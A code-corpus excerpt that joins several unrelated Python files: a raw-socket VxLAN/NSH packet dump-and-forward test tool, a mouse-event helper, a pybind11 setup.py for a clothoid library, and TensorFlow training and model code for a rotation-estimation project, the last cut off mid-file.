p_header = PSEUDO_UDPHEADER()
p_header.dest_ip = ip_header.ip_daddr
p_header.src_ip = ip_header.ip_saddr
p_header.length = udp_header.udp_len
p_header_pack = p_header.build()
udp_checksum = compute_internet_checksum(
p_header_pack + udp_header_pack + data)
udp_header.udp_sum = udp_checksum
# pack UDP header again but this time with checksum
udp_header_pack = udp_header.build()
return udp_header, udp_header_pack
def build_udp_packet(src_ip, dest_ip, src_port, dest_port, data, swap_ip):
"""
Data needs to encoded as Python bytes. In the case of strings
this means a bytearray of an UTF-8 encoding
"""
total_len = len(data) + IPV4_HEADER_LEN_BYTES + UDP_HEADER_LEN_BYTES
# First we build the IP header
ip_header, ip_header_pack = build_ipv4_header(total_len,
socket.IPPROTO_UDP,
src_ip, dest_ip, swap_ip)
# Build UDP header
udp_header, udp_header_pack = build_udp_header(src_port,
dest_port,
ip_header,
data)
udp_packet = ip_header_pack + udp_header_pack + data
return udp_packet
def getmac(interface):
try:
mac = open('/sys/class/net/'+interface+'/address').readline()
except:
mac = None
return mac
def print_ethheader(ethheader):
print(
"Eth Dst MAC: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x, "
"Src MAC: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x, Ethertype: 0x%.4x" % (
ethheader.dmac0, ethheader.dmac1, ethheader.dmac2, ethheader.dmac3,
ethheader.dmac4, ethheader.dmac5, ethheader.smac0, ethheader.smac1,
ethheader.smac2, ethheader.smac3, ethheader.smac4, ethheader.smac5,
(ethheader.ethertype0 << 8) | ethheader.ethertype1))
def print_ipheader(ipheader):
print(
"IP Version: %s IP Header Length: %s, "
"TTL: %s, Protocol: %s, Src IP: %s, Dst IP: %s" % (
ipheader.ip_ver, ipheader.ip_ihl, ipheader.ip_ttl,
ipheader.ip_proto,
str(socket.inet_ntoa(struct.pack('!I', ipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack('!I', ipheader.ip_daddr)))))
def print_udpheader(udpheader):
print ("UDP Src Port: %s, Dst Port: %s, Length: %s, Checksum: %s" % (
udpheader.udp_sport, udpheader.udp_dport,
udpheader.udp_len, udpheader.udp_sum))
def print_vxlanheader(vxlanheader):
print("VxLAN/VxLAN-gpe VNI: %s, flags: %.2x, Next: %s" % (
vxlanheader.vni, vxlanheader.flags, vxlanheader.next_protocol))
def print_nsh_baseheader(nshbaseheader):
print("NSH base nsp: %s, nsi: %s" % (
nshbaseheader.service_path, nshbaseheader.service_index))
def print_nsh_contextheader(nshcontextheader):
print("NSH context c1: 0x%.8x, c2: 0x%.8x, c3: 0x%.8x, c4: 0x%.8x" % (
nshcontextheader.network_platform, nshcontextheader.network_shared,
nshcontextheader.service_platform, nshcontextheader.service_shared))
def main():
module_desc = '''
This is a VxLAN/VxLAN-gpe + NSH dump and forward tool, you can use it to
dump and forward VxLAN/VxLAN-gpe + NSH packets, it can also act as an
NSH-aware SF for SFC test when you use --forward option, in that case,
it will automatically decrease nsi by one.
'''
parser = argparse.ArgumentParser(
description=module_desc, prog='vxlan_tool.py')
parser.add_argument(
'-i', '--interface',
help='Specify the interface to listen')
parser.add_argument(
'-d', '--do', choices=['dump', 'forward', 'send'],
help='dump/foward/send VxLAN/VxLAN-gpe + NSH or Eth + NSH packet')
parser.add_argument(
'-t', '--type', choices=['eth_nsh', 'vxlan_gpe_nsh'],
default='vxlan_gpe_nsh',
help='Specify packet type for send: eth_nsh or vxlan_gpe_nsh')
parser.add_argument(
'--outer-source-mac',
help='Specify outer source MAC for packet send')
parser.add_argument(
'--outer-destination-mac',
help='Specify outer destination MAC for packet send')
parser.add_argument(
'--outer-source-ip',
help='Specify outer source IP address for packet send')
parser.add_argument(
'--outer-destination-ip',
help='Specify outer destination IP address for packet send')
parser.add_argument(
'--outer-source-udp-port', type=int,
help='Specify outer source UDP port for packet send')
parser.add_argument(
'--inner-source-mac',
help='Specify inner source MAC for packet send')
parser.add_argument(
'--inner-destination-mac',
help='Specify inner destination MAC for packet send')
parser.add_argument(
'--inner-source-ip',
help='Specify inner source IP address for packet send')
parser.add_argument(
'--inner-destination-ip',
help='Specify inner destination IP address for packet send')
parser.add_argument(
'--inner-source-udp-port', type=int,
help='Specify inner source UDP port for packet send')
parser.add_argument(
'--inner-destination-udp-port', type=int,
help='Specify inner destination UDP port for packet send')
parser.add_argument(
'-n', '--number', type=int,
help='Specify number of packet to send')
parser.add_argument(
'--no-swap-ip', dest='swap_ip', default=True, action='store_false',
help="won't swap ip if provided")
parser.add_argument(
'-v', '--verbose', choices=['on', 'off'],
help='dump packets when in forward mode')
parser.add_argument(
'--forward-inner', '-f', dest='forward_inner',
default=False, action='store_true',
help='Strip the outer encapsulation and forward the inner packet')
parser.add_argument(
'--block', '-b', type=int, default=0,
help=('Acts as a firewall dropping packets '
'that match this TCP dst port'))
args = parser.parse_args()
macaddr = None
try:
s = socket.socket(
socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
if args.interface is not None:
s.bind((args.interface, 0))
if ((args.do == "forward") or (args.do == "send")):
if args.interface is None:
print("Error: you must specify the interface by "
"-i or --interface for forward and send")
sys.exit(-1)
send_s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
send_s.bind((args.interface, 0))
if args.interface is not None:
macstring = getmac(args.interface)
if (macstring is not None):
macaddr = macstring.split(':')
if (args.do == "send"):
if (args.inner_source_mac is None):
args.inner_source_mac = macstring
if (args.inner_destination_mac is None):
print("Error: you must specify inner "
"destination MAC for packet send")
sys.exit(-1)
if ((args.inner_source_ip is None) or
(args.inner_destination_ip is None)):
print("Error: you must specify inner source IP "
"and inner destination IP for packet send")
sys.exit(-1)
if (args.outer_source_mac is None):
args.outer_source_mac = args.inner_source_mac
if (args.outer_destination_mac is None):
args.outer_destination_mac = args.inner_destination_mac
if (args.outer_source_ip is None):
args.outer_source_ip = args.inner_source_ip
if (args.outer_destination_ip is None):
args.outer_destination_ip = args.inner_destination_ip
if (args.outer_source_udp_port is None):
args.outer_source_udp_port = 55651
if (args.inner_source_udp_port is None):
args.inner_source_udp_port = args.outer_source_udp_port
if (args.inner_destination_udp_port is None):
args.inner_destination_udp_port = 25
if (args.number is None):
args.number = 10
except OSError as e:
print("{}".format(e) + " '%s'" % args.interface)
sys.exit(-1)
do_print = ((args.do != "forward") or (args.verbose == "on"))
vxlan_gpe_udp_ports = [4790, 6633]
vxlan_udp_ports = [4789] + vxlan_gpe_udp_ports
# header len
eth_length = 14
ip_length = 20
udp_length = 8
vxlan_length = 8
nshbase_length = 8
nshcontext_length = 16
""" Send VxLAN/VxLAN-gpe + NSH packet """
if (args.do == "send"):
myethheader = ETHHEADER()
myipheader = IP4HEADER()
myudpheader = UDPHEADER()
myvxlanheader = VXLAN()
mynshbaseheader = BASEHEADER()
mynshcontextheader = CONTEXTHEADER()
""" Set Ethernet header """
dstmacaddr = args.outer_destination_mac.split(":")
myethheader.dmac0 = int(dstmacaddr[0], 16)
myethheader.dmac1 = int(dstmacaddr[1], 16)
myethheader.dmac2 = int(dstmacaddr[2], 16)
myethheader.dmac3 = int(dstmacaddr[3], 16)
myethheader.dmac4 = int(dstmacaddr[4], 16)
myethheader.dmac5 = int(dstmacaddr[5], 16)
myethheader.smac0 = int(macaddr[0], 16)
myethheader.smac1 = int(macaddr[1], 16)
myethheader.smac2 = int(macaddr[2], 16)
myethheader.smac3 = int(macaddr[3], 16)
myethheader.smac4 = int(macaddr[4], 16)
myethheader.smac5 = int(macaddr[5], 16)
myethheader.ethertype0 = 0x08
myethheader.ethertype1 = 0x00
""" Set VxLAN header """
myvxlanheader.flags = 0
myvxlanheader.reserved = 0
myvxlanheader.next_protocol = 0x04
myvxlanheader.vni = 0x1234
myvxlanheader.reserved2 = 0
""" Set NSH base header """
mynshbaseheader.flags = NSH_FLAG_ZERO
mynshbaseheader.length = NSH_TYPE1_LEN
mynshbaseheader.md_type = NSH_MD_TYPE1
mynshbaseheader.next_protocol = NSH_NEXT_PROTO_ETH
mynshbaseheader.service_path = 23
mynshbaseheader.service_index = 45
""" Set NSH context header """
mynshcontextheader.network_platform = int_from_bytes(
socket.inet_aton(args.outer_destination_ip))
mynshcontextheader.network_shared = 0x1234
mynshcontextheader.service_platform = 0x12345678
mynshcontextheader.service_shared = 0x87654321
innerippack = build_udp_packet(
args.inner_source_ip, args.inner_destination_ip,
args.inner_source_udp_port, args.inner_destination_udp_port,
"Hellow, World!!!".encode('utf-8'), False)
if (args.type == "vxlan_gpe_nsh"):
outerippack = build_udp_packet(
args.outer_source_ip, args.outer_destination_ip,
args.outer_source_udp_port, 4790,
(myvxlanheader.build() + mynshbaseheader.build() +
mynshcontextheader.build() + myethheader.build() +
innerippack),
False)
elif (args.type == "eth_nsh"):
outerippack = (
mynshbaseheader.build() + mynshcontextheader.build() +
myethheader.build() + innerippack)
myethheader.ethertype0 = 0x89
myethheader.ethertype1 = 0x4f
""" Build Ethernet packet """
ethpkt = myethheader.build() + outerippack
""" Decode ethernet header """
decode_eth(ethpkt, 0, myethheader)
if (args.type == "eth_nsh"):
offset = eth_length
decode_nsh_baseheader(ethpkt, offset, mynshbaseheader)
decode_nsh_contextheader(
ethpkt, offset + nshbase_length, mynshcontextheader)
elif (args.type == "vxlan_gpe_nsh"):
""" Decode IP header """
decode_ip(ethpkt, myipheader)
""" Decode UDP header """
decode_udp(ethpkt, myudpheader)
offset = eth_length + ip_length + udp_length + vxlan_length
decode_nsh_baseheader(ethpkt, offset, mynshbaseheader)
decode_nsh_contextheader(
ethpkt, offset + nshbase_length, mynshcontextheader)
pktnum = 0
while (args.number > 0):
""" Send it and make sure all the data is sent out """
pkt = ethpkt
while pkt:
sent = send_s.send(pkt)
pkt = pkt[sent:]
pktnum += 1
if (do_print):
print("\n\nPacket #%d" % pktnum)
""" Print ethernet header """
if (do_print):
print_ethheader(myethheader)
if (args.type == "vxlan_gpe_nsh"):
""" Print IP header """
if (do_print):
print_ipheader(myipheader)
""" Print UDP header """
if (do_print):
print_udpheader(myudpheader)
""" Print VxLAN/VxLAN-gpe header """
if (do_print):
print_vxlanheader(myvxlanheader)
""" Print NSH base header """
if (do_print):
print_nsh_baseheader(mynshbaseheader)
""" Print NSH context header """
if (do_print):
print_nsh_contextheader(mynshcontextheader)
args.number -= 1
sys.exit(0)
# receive a packet
pktnum = 0
while True:
packet = s.recvfrom(65565)
# packet string from tuple
packet = packet[0]
myethheader = ETHHEADER()
myinsertedethheader = ETHHEADER()
has_inserted_eth = False
""" Decode ethernet header """
decode_eth(packet, 0, myethheader)
if ((myethheader.ethertype0 != 0x08) or
(myethheader.ethertype1 != 0x00)):
if ((myethheader.ethertype0 != 0x89) or
(myethheader.ethertype1 != 0x4f)):
continue
if (macaddr is not None):
if ((myethheader.dmac4 != int(macaddr[4], 16)) or
(myethheader.dmac5 != int(macaddr[5], 16))):
continue
""" Check if the received packet was ETH + NSH """
if ((myethheader.ethertype0 == 0x89) or
(myethheader.ethertype1 == 0x4f)):
pktnum = pktnum + 1
print("\n\nPacket #%d" % pktnum)
""" Eth + NSH """
mynshbaseheader = BASEHEADER()
mynshcontextheader = CONTEXTHEADER()
offset = eth_length
decode_nsh_baseheader(packet, offset, mynshbaseheader)
decode_nsh_contextheader(
packet, offset + nshbase_length, mynshcontextheader)
""" Print ethernet header """
print_ethheader(myethheader)
""" Print NSH base header """
print_nsh_baseheader(mynshbaseheader)
""" Print NSH context header """
print_nsh_contextheader(mynshcontextheader)
"""
Check if Firewall checking is enabled,
and block/drop if its the same TCP port
"""
if (args.block != 0):
mytcpheader = TCPHEADER()
decode_tcp(packet, 0, mytcpheader)
if (mytcpheader.tcp_dport == args.block):
print(
bcolors.WARNING + "TCP packet dropped on port: " +
str(args.block) + bcolors.ENDC)
continue
if ((args.do == "forward") and (args.interface is not None)):
""" nsi minus one for send """
mynshbaseheader.service_index -= 1
""" Build Ethernet header """
newethheader = build_ethernet_header_swap(myethheader)
""" Build Ethernet packet """
pkt = (newethheader.build() + mynshbaseheader.build() +
mynshcontextheader.build() +
packet[eth_length+nshbase_length+nshcontext_length:])
""" Send it and make sure all the data is sent out """
while pkt:
sent = send_s.send(pkt)
pkt = pkt[sent:]
continue
pktnum = pktnum + 1
if (do_print):
print("\n\nPacket #%d" % pktnum)
""" Print ethernet header """
if (do_print):
print_ethheader(myethheader)
myipheader = IP4HEADER()
""" Decode IP header """
decode_ip(packet, myipheader)
""" Print IP header """
if (do_print):
print_ipheader(myipheader)
if (myipheader.ip_proto != 17):
continue
myudpheader = UDPHEADER()
""" Decode UDP header """
decode_udp(packet, myudpheader)
""" Print UDP header """
if (do_print):
print_udpheader(myudpheader)
if (myudpheader.udp_dport not in vxlan_udp_ports):
continue
myvxlanheader = VXLAN()
""" Decode VxLAN/VxLAN-gpe header """
decode_vxlan(packet, myvxlanheader)
""" Print VxLAN/VxLAN-gpe header """
if (do_print):
print_vxlanheader(myvxlanheader)
mynshbaseheader = BASEHEADER()
mynshcontextheader = CONTEXTHEADER()
""" Print NSH header """
if (myudpheader.udp_dport in vxlan_gpe_udp_ports):
offset = eth_length + ip_length + udp_length + vxlan_length
""" Decode inserted ethernet header before NSH """
decode_eth(packet, offset, myinsertedethheader)
if ((myinsertedethheader.ethertype0 == 0x89) and
(myinsertedethheader.ethertype1 == 0x4f)):
has_inserted_eth = True
offset += eth_length
decode_nsh_baseheader(packet, offset, mynshbaseheader)
offset += nshbase_length
decode_nsh_contextheader(packet, offset, mynshcontextheader)
offset += nshcontext_length
""" Print NSH base header """
if (do_print):
print_nsh_baseheader(mynshbaseheader)
""" Print NSH context header """
if (do_print):
print_nsh_contextheader(mynshcontextheader)
"""
Check if Firewall checking is enabled,
and block/drop if its the same TCP port
"""
if (args.block != 0):
mytcpheader = TCPHEADER()
decode_tcp(packet, eth_length, mytcpheader)
if (mytcpheader.tcp_dport == args.block):
print(
bcolors.WARNING + "TCP packet dropped on port: " +
str(args.block) + bcolors.ENDC)
continue
if ((args.do == "forward") and
(args.interface is not None) and
(mynshbaseheader.service_index > 1)):
""" Build Ethernet header """
newethheader = build_ethernet_header_swap(myethheader)
"""
Build the packet, either encapsulated,
or the original inner packet
"""
pkt = None
if args.forward_inner:
""" Just build the original, inner packet """
inner_offset = (eth_length + ip_length + udp_length +
vxlan_length + nshbase_length +
nshcontext_length)
inner_ethheader = ETHHEADER()
# Get the inner ethernet header
decode_eth(packet[inner_offset:], inner_ethheader)
# The new SourceMac should be the outer dest,
# and the new DestMac should be the inner dest
# This call sets the new SourceMac to be the outer dest
newethheader = build_ethernet_header_swap(myethheader)
# Now set the DestMac to be the inner dest
newethheader.dmac0 = inner_ethheader.dmac0
newethheader.dmac1 = inner_ethheader.dmac1
newethheader.dmac2 = inner_ethheader.dmac2
newethheader.dmac3 = inner_ethheader.dmac3
newethheader.dmac4 = inner_ethheader.dmac4
newethheader.dmac5 = inner_ethheader.dmac5
pkt = (newethheader.build() +
packet[inner_offset + eth_length:])
else:
""" Build IP packet"""
if (myudpheader.udp_dport in vxlan_gpe_udp_ports):
""" nsi minus one """
mynshbaseheader.service_index -= 1
if (has_inserted_eth is True):
ippack = build_udp_packet(
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_daddr))),
myudpheader.udp_sport,
myudpheader.udp_dport,
(myvxlanheader.build() +
myinsertedethheader.build() +
mynshbaseheader.build() +
mynshcontextheader.build() +
packet[offset:]),
args.swap_ip)
else:
ippack = build_udp_packet(
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_daddr))),
myudpheader.udp_sport,
myudpheader.udp_dport,
(myvxlanheader.build() +
mynshbaseheader.build() +
mynshcontextheader.build() +
packet[offset:]),
args.swap_ip)
else:
ippack = build_udp_packet(
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_daddr))),
myudpheader.udp_sport,
myudpheader.udp_dport,
packet[eth_length+ip_length+udp_length:],
args.swap_ip)
""" Build Ethernet packet """
pkt = newethheader.build() + ippack
""" Send it and make sure all the data is sent out """
while pkt:
sent = send_s.send(pkt)
pkt = pkt[sent:]
if __name__ == "__main__":
main()
``` |
{
"source": "johSchm/cloudia",
"score": 3
} |
#### File: johSchm/cloudia/utils.py
```python
from enum import Enum
class MouseEvents(Enum):
RIGHT = 0
LEFT = 1
MIDDLE = 2
def mouse_click_identifier(event):
""" event also has x & y attributes
"""
if event.num == 1:
return MouseEvents.LEFT
elif event.num == 2:
return MouseEvents.RIGHT
else:
return MouseEvents.MIDDLE
``` |
{
"source": "johschmitz/pyclothoids",
"score": 2
} |
#### File: johschmitz/pyclothoids/setup.py
```python
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
import sys
import setuptools
from pathlib import Path
from os import listdir
from os.path import isfile, join, abspath, dirname
__version__ = '0.1.2'
class get_pybind_include(object):
"""Helper class to determine the pybind11 include path
The purpose of this class is to postpone importing pybind11
until it is actually installed, so that the ``get_include()``
method can be invoked. """
def __init__(self, user=False):
self.user = user
def __str__(self):
import pybind11
return pybind11.get_include(self.user)
extensions = [
Extension(
'pyclothoids._clothoids_cpp',
[join('pyclothoids' , *i) for i in (('src','main.cpp'),('src','Submodules','Clothoids','src','Fresnel.cc'),('src','Submodules','Clothoids','src','Clothoid.cc'),
('src','Submodules','Clothoids','src','G2lib.cc'),('src','Submodules','Clothoids','src','AABBtree.cc'),('src','Submodules','Clothoids','src','Biarc.cc'),('src','Submodules','Clothoids','src','BiarcList.cc'),
('src','Submodules','Clothoids','src','Circle.cc'),
('src','Submodules','Clothoids','src','ClothoidDistance.cc'),('src','Submodules','Clothoids','src','ClothoidG2.cc'),('src','Submodules','Clothoids','src','ClothoidList.cc'),
('src','Submodules','Clothoids','src','G2lib_intersect.cc'),('src','Submodules','Clothoids','src','Line.cc'),('src','Submodules','Clothoids','src','PolyLine.cc'),
('src','Submodules','Clothoids','src','Triangle2D.cc'),
('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-1-Quadratic.cc'),('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-2-Cubic.cc'),
('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-3-Quartic.cc'),('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-Jenkins-Traub.cc'),
('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-Utils.cc'))],
include_dirs=[
# Path to pybind11 headers
get_pybind_include(),
get_pybind_include(user=True),
join('pyclothoids','src','Submodules','Clothoids','src'),
join('pyclothoids','src','Submodules','Clothoids','submodules','quarticRootsFlocke','src')
],
language='c++'
),
]
# As of Python 3.6, CCompiler has a `has_flag` method.
# cf http://bugs.python.org/issue26689
def has_flag(compiler, flagname):
"""Return a boolean indicating whether a flag name is supported on
the specified compiler.
"""
import tempfile
with tempfile.NamedTemporaryFile('w', suffix='.cpp') as f:
f.write('int main (int argc, char **argv) { return 0; }')
try:
compiler.compile([f.name], extra_postargs=[flagname])
except setuptools.distutils.errors.CompileError:
return False
return True
def cpp_flag(compiler):
"""Return the -std=c++[11/14/17] compiler flag.
The newer version is prefered over c++11 (when it is available).
"""
flags = ['-std=c++11'] #'-std=c++17', '-std=c++14',
for flag in flags:
if has_flag(compiler, flag): return flag
raise RuntimeError('Unsupported compiler -- at least C++11 support '
'is needed!')
class BuildExt(build_ext):
"""A custom build extension for adding compiler-specific options."""
c_opts = {
'msvc': ['/EHsc'],
'unix': [],
}
l_opts = {
'msvc': [],
'unix': [],
}
if sys.platform == 'darwin':
darwin_opts = ['-stdlib=libc++', '-mmacosx-version-min=10.7']
c_opts['unix'] += darwin_opts
l_opts['unix'] += darwin_opts
def build_extensions(self):
ct = self.compiler.compiler_type
opts = self.c_opts.get(ct, [])
link_opts = self.l_opts.get(ct, [])
if ct == 'unix':
opts.append('-DVERSION_INFO="%s"' % self.distribution.get_version())
opts.append(cpp_flag(self.compiler))
if has_flag(self.compiler, '-fvisibility=hidden'):
opts.append('-fvisibility=hidden')
elif ct == 'msvc':
opts.append('/DVERSION_INFO=\\"%s\\"' % self.distribution.get_version())
for ext in self.extensions:
ext.extra_compile_args = opts
ext.extra_link_args = link_opts
build_ext.build_extensions(self)
# read the contents of your README file
this_directory = abspath(dirname(__file__))
with open(join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pyclothoids',
version=__version__,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/phillipd94/PyClothoids',
description='A library for clothoid curves in Python',
long_description=long_description,
long_description_content_type='text/markdown',
packages = ['pyclothoids'],
ext_modules=extensions,
install_requires=['pybind11>=2.4'],
setup_requires=['pybind11>=2.4'],
cmdclass={'build_ext': BuildExt},
zip_safe=False,
)
``` |
{
"source": "johSchm/RadialBeams",
"score": 2
} |
#### File: RadialBeams/src/learning.py
```python
import math
import tensorflow as tf
from tqdm import tqdm
def training(model, train_dataset, val_dataset, test_dataset, optimizer, lines, angles,
epochs=128, name='', continuous=False, prior='off'):
pbar = tqdm(range(epochs), desc='---')
for e in pbar:
# validation, before training to log also the init behaviour of the model
val_circle_loss = []
for i, sample in enumerate(val_dataset):
x = tf.concat([sample['vec'][:, None], sample['vec_rot'][:, None]], axis=1)
pred_facts, pred_angle, conv_latents, gnn_latents, distance_matrix, \
x1_emb, x2_emb, angle_energy, rnn_encoding = model(x)
unit_circle_loss, _ = loss_func(pred_angle, pred_facts, angles, sample['angle'], continuous=continuous)
val_circle_loss.append(unit_circle_loss)
# testing / deployment
test_circle_loss = []
for i, sample in enumerate(test_dataset):
# duplicate the second (rotated) augmentation image and ignore the angle branch output
# (batch x augmentation x size_vector_field x proximity x pixel_count_per_vector x channels)
pred_facts, pred_angle, conv_latents, gnn_latents, distance_matrix, \
x1_emb, x2_emb, angle_energy, rnn_encoding = model(
tf.tile(sample['vec_rot'][:, None, ...], [1, 2, 1, 1, 1, 1]))
unit_circle_loss, _ = loss_func(pred_angle, pred_facts, angles, sample['angle'], continuous=continuous)
test_circle_loss.append(unit_circle_loss)
# training
train_circle_loss = []
for i, sample in enumerate(train_dataset):
with tf.GradientTape() as tape:
x = tf.concat([sample['vec'][:, None], sample['vec_rot'][:, None]], axis=1)
pred_facts, pred_angle, conv_latents, gnn_latents, distance_matrix, \
x1_emb, x2_emb, angle_energy, rnn_encoding = model(x)
unit_circle_loss, toeplitz_loss = loss_func(pred_angle, pred_facts, angles,
sample['angle'], continuous=continuous)
if prior == 'off':
loss = unit_circle_loss
elif prior == 'linear':
k = e / (epochs - 1)
loss = k * unit_circle_loss + (1 - k) * toeplitz_loss
else:
loss = unit_circle_loss + toeplitz_loss
grads_model = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads_model, model.trainable_variables))
train_circle_loss.append(unit_circle_loss)
pbar.set_description("Training loss {0:.3f} | Validation loss {1:.3f} | Testing loss {2:.3f}".format(
tf.reduce_mean(train_circle_loss), tf.reduce_mean(val_circle_loss), tf.reduce_mean(test_circle_loss)))
tf.keras.models.save_model(model, 'model/' + name + '.h5py', include_optimizer=False)
def loss_func(pred_angle: tf.Tensor, pred_facts, angles, gt_angles, continuous=False) -> tuple:
""" Regression since this respects the spatial angle information.
That is, if the prediction is 30 degree but the true is 35 degree,
a regression will respect the closeness which is ignored by a categorical loss.
DO NOT USE tf.reduce_sum(angle_factor_distr * angles[None, :], axis=-1)
since this introduces symmetries, like 0.5 * 10 + 0.5 * 20 = 0.1 * 50 + 0.5 * 20
"""
d = tf.constant(0.)
if not continuous:
# invert the angle since we would like to rotate back
# from an optimization perspective that shouldn't make a difference
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, label_smoothing=0, axis=-1)
# log to encourage exploration
d = cce(gt_angles, pred_facts)
gt_angles = (tf.reduce_sum(angles[None, :] * gt_angles, axis=-1) * math.pi) / 180.
a = (tf.math.sin(gt_angles) - pred_angle[:, 1]) ** 2 + (tf.math.cos(gt_angles) - pred_angle[:, 0]) ** 2
return tf.reduce_mean(a), tf.reduce_mean(d)
```
#### File: RadialBeams/src/model.py
```python
import tensorflow as tf
import numpy as np
class GraphConvolutionLayer(tf.keras.layers.Layer):
def __init__(self, units, A, activation=tf.identity, rate=0.0, l2=0.0):
super(GraphConvolutionLayer, self).__init__()
self.activation = activation
self.units = units
self.rate = rate
self.l2 = l2
self.A = A
def build(self, input_shape):
self.W = self.add_weight(
shape=(input_shape[-1], self.units),
dtype=self.dtype,
name='gnn_weights',
initializer='glorot_uniform',
regularizer=tf.keras.regularizers.l2(self.l2)
)
def call(self, X):
"""
input (batch x vector x hidden)
output (batch x vector x hidden)
"""
X = tf.nn.dropout(X, self.rate)
X = self.A @ X @ self.W
return self.activation(X)
def wheel_graph_adjacency_matrix(n_vectors):
adjacency = np.zeros([n_vectors + 1, n_vectors + 1])
adjacency[0, 1] = 1
adjacency[0, n_vectors - 1] = 1
for i in range(1, n_vectors - 1):
adjacency[i, i-1] = 1
adjacency[i, -1] = 1
adjacency[n_vectors - 1, n_vectors - 2] = 1
adjacency[n_vectors - 1, 0] = 1
return tf.cast(adjacency, tf.float32)
def angle_matrix(n_vectors: int) -> tf.Tensor:
""" Returns triangular matrix degrading to the center
"""
matrix = tf.fill([n_vectors, n_vectors], float(n_vectors))
for i in tf.range(n_vectors):
matrix -= tf.linalg.band_part(tf.ones((n_vectors, n_vectors)), i, -1)
matrix += tf.linalg.band_part(tf.ones((n_vectors, n_vectors)), 0, i)
return matrix - float(n_vectors) * tf.eye(n_vectors)
def toeplitz_extractor(n_vectors: int) -> tf.Tensor:
return tf.cast(
[tf.roll(tf.eye(n_vectors), shift=i, axis=0) for i in tf.range(n_vectors)],
tf.float32)
class BeamEncoder(tf.keras.layers.Layer):
def __init__(self, hidden=128, target_size=28, activation=tf.nn.leaky_relu, n_pixels=14, **kwargs):
super().__init__(**kwargs)
self.hidden = hidden
self.activation = activation
self.target_size = target_size
self.n_pixels = n_pixels
self.w_init = tf.keras.initializers.HeNormal()
self.b_init = tf.constant_initializer(0.01)
self.proxkernels = []
self.tempkernels = []
def build(self, input_shape):
# general output: (batch x 2 x vec x 1 x n-2 x H/8)
self.proxkernels = [
# (batch x augmentation=2 x vec x proximity=3 x pixels=14 x 1) -> (batch x 2 x vec x 3-2 x n-2 x H/8)
tf.keras.layers.Conv2D(self.hidden // 8, (3, 3), data_format="channels_last",
activation=self.activation, padding='valid'),
]
# eg fashion mnist
if self.n_pixels == 14:
self.tempkernels = [
# (batch x 2 x vec x 1 x 14-2 x H/8) -> (batch x 2 x vec x 1 x 14-5 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 14-5 x H/8) -> (batch x 2 x vec x 1 x 14-8 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 14-8 x H/8) -> (batch x 2 x vec x 1 x 14-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 14-11 x H/4) -> (batch x 2 x vec x 1 x 14-14 x H/2)
tf.keras.layers.Conv1D(self.hidden // 1, 3, activation=self.activation,
padding='valid', data_format="channels_last")
]
# eg cifar
elif self.n_pixels == 16:
self.tempkernels = [
# (batch x 2 x vec x 1 x 16-2 x H/8) -> (batch x 2 x vec x 1 x 16-5 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-5 x H/8) -> (batch x 2 x vec x 1 x 16-8 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-8 x H/8) -> (batch x 2 x vec x 1 x 16-11 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-11 x H/4) -> (batch x 2 x vec x 1 x 16-14 x H/2)
tf.keras.layers.Conv1D(self.hidden // 1, 4, activation=self.activation,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 16-14 x H/4) -> (batch x 2 x vec x 1 x 16-16 x H/2)
tf.keras.layers.Conv1D(self.hidden // 1, 2, activation=self.activation,
padding='valid', data_format="channels_last")
]
elif self.n_pixels == 32:
self.tempkernels = [
# (batch x 2 x vec x 1 x 32-2 x H/8) -> (batch x 2 x vec x 1 x 32-6/2=13 x H/4)
tf.keras.layers.Conv1D(self.hidden // 4, 5, activation=self.activation, strides=2,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13 x H/8) -> (batch x 2 x vec x 1 x 13-3 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-3 x H/8) -> (batch x 2 x vec x 1 x 13-6 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-6 x H/8) -> (batch x 2 x vec x 1 x 13-9 x H/4)
tf.keras.layers.Conv1D(self.hidden // 2, 4, activation=self.activation, strides=1,
padding='valid', data_format="channels_last"),
# (batch x 2 x vec x 1 x 13-9 x H/8) -> (batch x 2 x vec x 1 x 13-11 x H/4)
